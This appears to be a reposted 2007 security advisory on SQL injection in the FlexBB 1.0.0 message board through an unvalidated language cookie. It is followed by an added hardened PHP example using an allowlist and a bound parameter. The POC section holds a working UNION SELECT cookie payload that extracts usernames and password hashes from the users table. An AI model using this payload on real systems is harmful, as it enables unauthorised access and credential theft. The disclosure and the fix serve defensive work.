
advisory-481.txt

29 Mar 2007 | Reported by trueend5 | Type: packetstorm | Source: packetstormsecurity.com

Flexbb 1.0.0 is vulnerable to SQL injection, allowing remote exploitation via unvalidated input.

Code
`  
KAPDA New advisory  
Vendor: http://www.flexbb.net  
Vulnerable Version: 1.0.0 10005 Beta Release 1  
Bug: SQL Injection  
Exploitation: Remote with browser  
  
Description:  
--------------------  
Flexbb is a freely available PHP-based message board  
program that uses a MySQL database.  
  
Vulnerability:  
--------------------  
SQL Injection:  
The software does not properly validate user-supplied  
input, which may allow a remote user to launch SQL  
injection attacks.  
There are multiple input validation errors, for  
example:  
// Code Snippet  
// Includes/Start.php  
// Lines #190-197  
if($_COOKIE['flexbb_lang_id'] == "")  
{  
$lang_id = $config['default_lang_id'];  
}  
else  
{  
$lang_id = $_COOKIE['flexbb_lang_id']; //--->Input Validation Error  
}  
  
POC:  
--------------------  
Condition: Magic quotes GPC = Off  
GET: http://example.com/flexbb/index.php?debug=1  
Cookie Name = flexbb_lang_id  
Cookie Value = none' UNION SELECT 'en',`username`,  
`password`,1,1 FROM `flexbb_users` WHERE `group` = '4  
  
Original Advisory:  
--------------------  
http://www.kapda.ir/advisory-481.html  
  
Solution:  
--------------------  
No response from vendor, there is no solution at the  
time of this entry.  
  
Credit :  
--------------------  
Discovered & released by trueend5 (trueend5 kapda ir)  
Security Science Researchers Institute Of Iran  
[http://www.KAPDA.ir]  
  
  
  
  
`
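
A hardened form of the cookie handling quoted from Includes/Start.php, as an added example that is not FlexBB's code and not part of the original advisory. It assumes language ids are short alphanumeric tokens; the table `example_languages`, its columns, the helper function names and the in-memory SQLite database (standing in for MySQL) are hypothetical.

```php
<?php
// Added example, not FlexBB code. Assumptions: language ids are short
// alphanumeric tokens; example_languages and its columns are placeholders;
// in-memory SQLite stands in for the MySQL database.

function resolve_lang_id(array $cookies, string $default): string
{
    $raw = $cookies['flexbb_lang_id'] ?? '';
    // Allowlist check: reject arrays, empty values and anything outside
    // [A-Za-z0-9_-]{1,16}; \A and \z anchor the whole string.
    if (!is_string($raw) || preg_match('/\A[A-Za-z0-9_-]{1,16}\z/', $raw) !== 1) {
        return $default;
    }
    return $raw;
}

function load_language(PDO $db, string $langId): ?array
{
    // Bound parameter: the cookie value is sent as data, never as SQL text.
    $stmt = $db->prepare('SELECT id, name FROM example_languages WHERE id = :id');
    $stmt->execute([':id' => $langId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE example_languages (id TEXT PRIMARY KEY, name TEXT)");
$db->exec("INSERT INTO example_languages VALUES ('en', 'English'), ('fa', 'Persian')");

$config = ['default_lang_id' => 'en'];
$samples = [ // constructed cookie jars
    'valid'     => ['flexbb_lang_id' => 'fa'],
    'missing'   => [],
    'malformed' => ['flexbb_lang_id' => "none'"],   // contains a quote character
    'array'     => ['flexbb_lang_id' => ['x']],     // flexbb_lang_id[]=x
];
foreach ($samples as $label => $cookies) {
    $id  = resolve_lang_id($cookies, $config['default_lang_id']);
    $row = load_language($db, $id) ?? load_language($db, $config['default_lang_id']);
    printf("%-9s -> lang_id=%s name=%s\n", $label, $id, $row['name']);
}
```

The allowlist and the bound parameter are independent layers: either one alone keeps the cookie value out of the SQL text, and the fix no longer depends on the Magic quotes GPC setting named in the POC condition.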
